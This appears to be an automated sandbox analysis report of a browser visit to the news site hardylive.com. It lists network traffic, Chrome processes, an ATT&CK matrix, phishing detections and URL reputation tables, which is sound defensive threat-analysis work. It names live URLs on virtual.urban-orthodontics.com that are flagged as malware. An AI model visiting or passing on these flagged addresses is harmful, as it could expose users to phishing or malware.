        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 46.173.214.32:443 -> 192.168.2.4:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 46.173.214.32:443 -> 192.168.2.4:49747 version: TLS 1.2
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir5864_712980428Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir5864_712980428Jump to behavior
        Source: classification engineClassification label: mal72.phis.win@22/171@26/9
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\e19e51f5-ccba-4abf-90bd-a265aa48365a.tmpJump to behavior
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,13557621258873691069,17181680450178174728,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2060 /prefetch:3
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://hardylive.com"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,13557621258873691069,17181680450178174728,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2060 /prefetch:3Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        11
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        File Deletion
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1635542 URL: http://hardylive.com Startdate: 11/03/2025 Architecture: WINDOWS Score: 72 24 Suricata IDS alerts for network traffic 2->24 26 Antivirus detection for URL or domain 2->26 28 Yara detected HtmlPhish10 2->28 30 2 other signatures 2->30 6 chrome.exe 13 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49708 unknown unknown 6->14 16 192.168.2.16 unknown unknown 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 virtual.urban-orthodontics.com 185.76.79.50, 443, 49788, 49828 TVHORADADAES Spain 11->18 20 www.google.com 172.217.16.196, 443, 49726, 49850 GOOGLEUS United States 11->20 22 5 other IPs or domains 11->22

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        http://hardylive.com0%Avira URL Cloudsafe
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://hardylive.com/2025/03/04/brenda-christine-staley-george/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-fa4/font0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/advanced-ads-pro/assets/js/advanced-ads-pro.min.js?ver=2.26.10%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.9.7.10%Avira URL Cloudsafe
        https://hardylive.com/2024/12/23/moorefield-examiner-eedition-december-25-2024/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=aab4a50%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/mailster/build/form/style-index.css?ver=0b25e10%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/skins/default/skin.0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core-com0%Avira URL Cloudsafe
        https://code.tutsplus.com/articles/using-the-included-password-strength-meter-script-in-wordpress--w0%Avira URL Cloudsafe
        https://hardylive.com/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.27.60%Avira URL Cloudsafe
        https://hardylive.com/category/opinion/0%Avira URL Cloudsafe
        https://hardylive.com/wp-includes/js/comment-reply.min.js?ver=0b25e10%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.27.60%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core.js?0%Avira URL Cloudsafe
        https://hardylive.com/2025/02/24/moorefield-examiner-eedition-february-26-2025/0%Avira URL Cloudsafe
        https://hardylive.com/2025/02/24/nina-garrett-rudy/0%Avira URL Cloudsafe
        https://hardylive.com/wp-includes/js/imagesloaded.min.js?ver=5.0.00%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.27.60%Avira URL Cloudsafe
        https://hardylive.com/wp-includes/js/hoverIntent.min.js?ver=1.10.20%Avira URL Cloudsafe
        https://hardylive.com/2025/03/04/mary-franklin-knotts-van-meter/0%Avira URL Cloudsafe
        https://hardylive.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac60%Avira URL Cloudsafe
        https://hardylive.com/wp-admin/admin-ajax.php?action=rest-nonce0%Avira URL Cloudsafe
        https://hardylive.com/2025/02/17/moorefield-examiner-eedition-february-19-2025/#comments0%Avira URL Cloudsafe
        https://hardylive.com/category/eprint/feed/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=aab4a50%Avira URL Cloudsafe
        https://hardylive.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e60%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-0%Avira URL Cloudsafe
        https://hardylive.com/2025/03/04/hardy-county-scores/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core-compiled.css?ver=560%Avira URL Cloudsafe
        https://hardylive.com/2025/03/04/more-than-meals-on-wheels-hardy-county-committee-on-agings-provides0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=aab4a50%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/image-map-pro-wordpress/js/image-map-pro.min.js?ver=5.3.20%Avira URL Cloudsafe
        https://hardylive.com/2025/01/21/moorefield-examiner-eedition-january-22-2025/0%Avira URL Cloudsafe
        https://hardylive.com/my-account/0%Avira URL Cloudsafe
        https://hardylive.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhardylive.com%2F&#038;format=xml0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9.7.10%Avira URL Cloudsafe
        https://hardylive.com/2025/01/21/moorefield-examiner-eedition-january-22-2025/#comments0%Avira URL Cloudsafe
        https://hardylive.com/2025/02/24/owen-eugene-whetzel/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/css/brands.css?ver=aab4a50%Avira URL Cloudsafe
        https://hardylive.com/2025/02/03/moorefield-examiner-eedition-february-5-2025/0%Avira URL Cloudsafe
        https://websitesetup.org/http-to-https-wordpress/0%Avira URL Cloudsafe
        https://hardylive.com/2025/02/17/moorefield-examiner-eedition-february-19-2025/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/themes/jnews/assets/css/elementor-frontend.css?ver=1.0.00%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=0%Avira URL Cloudsafe
        https://www.lostriverrealestate.com/0%Avira URL Cloudsafe
        https://hardylive.com/2025/01/13/moorefield-examiner-eedition-january-15-2025/#comments0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/themes/jnews/assets/dist/font/fontawesome-webfont.woff20%Avira URL Cloudsafe
        https://hardylive.com/wp-content/themes/jnews/assets/img/jeg-empty.png0%Avira URL Cloudsafe
        https://hardylive.com/wp-json/mailster/v1/forms/12823/impression?_locale=user0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/user-registration/assets/css/user-registration.css?ver=4.1.0%Avira URL Cloudsafe
        https://hardylive.com/2025/01/28/moorefield-examiner-eedition-january-29-2025/0%Avira URL Cloudsafe
        https://hardylive.com/category/sports/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?0%Avira URL Cloudsafe
        https://hardylive.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.00%Avira URL Cloudsafe
        https://hardylive.com/2025/03/04/moorefield-examiner-eedition-march-5-2025/0%Avira URL Cloudsafe
        https://hardylive.com/2025/03/04/centers-for-disease-control-release-new-avian-flu-update/#comments0%Avira URL Cloudsafe
        https://hardylive.com/category/breaking-news/0%Avira URL Cloudsafe
        https://hardylive.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%Avira URL Cloudsafe
        https://hardylive.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.10%Avira URL Cloudsafe
        https://hardylive.com/2025/03/04/certificate-of-need-laws-challenged-in-west-virginia/0%Avira URL Cloudsafe
        https://hardylive.com/2025/01/07/moorefield-examiner-eedition-january-8-2025/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.00%Avira URL Cloudsafe
        https://hdmediaplus.com/outside-the-echo-chamber/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/themes/jnews/assets/dist/image/preloader.gif0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core.js?ver=560%Avira URL Cloudsafe
        https://hardylive.com/wp-content/themes/jnews/assets/js/html5shiv.min.js?ver=1.0.00%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=aab4a50%Avira URL Cloudsafe
        https://hardylive.com/2025/03/04/new-warner-still-same-commitment-to-excellence-in-the-secretary-of-0%Avira URL Cloudsafe
        https://virtual.urban-orthodontics.com/KAKxe1Mg0hJMIItJHjGdWVt21AsKOJMXSWzVEkZl7ghcY8UICi6TCFwgi0kEIMNZEiDZEUdh2Q5ZZMcUUHvIAUEgzA==100%Avira URL Cloudmalware
        https://hardylive.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=aab4a0%Avira URL Cloudsafe
        https://hardylive.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhardylive.com%2F0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt0%Avira URL Cloudsafe
        https://hardylive.com/2025/03/04/mary-margaret-marge-kuykendall/0%Avira URL Cloudsafe
        https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.js?ver=1.0.00%Avira URL Cloudsafe
        https://static.mailster.co/forms/dazzled-shocked-individual-dressed-in-casual-shirt.png);opacity:0%;0%Avira URL Cloudsafe
        https://hardylive.com/2024/12/23/moorefield-examiner-eedition-december-25-2024/#comments0%Avira URL Cloudsafe
        https://virtual.urban-orthodontics.com/mMawr+Pk08b85IqdrvWcjeuy1d+6/JLD+ajUxvah79zsp8TcuuqS3Ozkipy05MKNouTV3f6y18viq5LS100%Avira URL Cloudmalware
        https://hardylive.com/wp-content/uploads/sites/35/2022/09/LRRE_Webad-1.gif0%Avira URL Cloudsafe
        https://hardylive.com/wp-includes/js/dist/url.min.js?ver=e87eb76272a3a08402d20%Avira URL Cloudsafe
        https://hardylive.com/2025/02/11/moorefield-examiner-eedition-february-12-2025/0%Avira URL Cloudsafe
        https://hardylive.com/wp-includes/css/dist/block-library/style.min.css?ver=0b25e10%Avira URL Cloudsafe

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        hardylive.com
        198.12.251.68
        truefalse
          unknown
          virtual.urban-orthodontics.com
          185.76.79.50
          truefalse
            high
            www.google.com
            172.217.16.196
            truefalse
              high
              apiexplorerzone.com
              46.173.214.32
              truefalse
                high
                adserver.paywallproject.com
                172.67.188.237
                truefalse
                  unknown
                  static.mailster.co
                  188.114.97.3
                  truefalse
                    unknown
                    g.adspeed.net
                    45.77.88.11
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://g.adspeed.net/ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blank&cb=0.27459611524525585&ref=https%3A//hardylive.com/&uri=https%3A//hardylive.com/category/eprint/false
                        high
                        https://g.adspeed.net/ad.php?do=imp&aid=1125399&zid=117078&t=1741716181&auth=108567e63140a07de4bc55b82a10706c&oid=27064&wd=-1&ht=-1&ref=https%3A%2F%2Fhardylive.com%2F&uri=https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2Ffalse
                          high
                          https://hardylive.com/wp-content/plugins/mailster/build/form/style-index.css?ver=0b25e1false
                          • Avira URL Cloud: safe
                          unknown
                          https://hardylive.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=aab4a5false
                          • Avira URL Cloud: safe
                          unknown
                          https://g.adspeed.net/ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blankfalse
                            high
                            https://hardylive.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.9.7.1false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/plugins/advanced-ads-pro/assets/js/advanced-ads-pro.min.js?ver=2.26.1false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.27.6false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-includes/js/imagesloaded.min.js?ver=5.0.0false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=aab4a5false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core-compiled.css?ver=56false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/plugins/image-map-pro-wordpress/js/image-map-pro.min.js?ver=5.3.2false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9.7.1false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=aab4a5false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/plugins/woocommerce/assets/css/brands.css?ver=aab4a5false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/themes/jnews/assets/css/elementor-frontend.css?ver=1.0.0false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/themes/jnews/assets/dist/font/fontawesome-webfont.woff2false
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-content/themes/jnews/assets/img/jeg-empty.pngfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://hardylive.com/wp-json/mailster/v1/forms/12823/impression?_locale=userfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://virtual.urban-orthodontics.com/SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY=false
                              high
                              https://hardylive.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0false
                              • Avira URL Cloud: safe
                              unknown
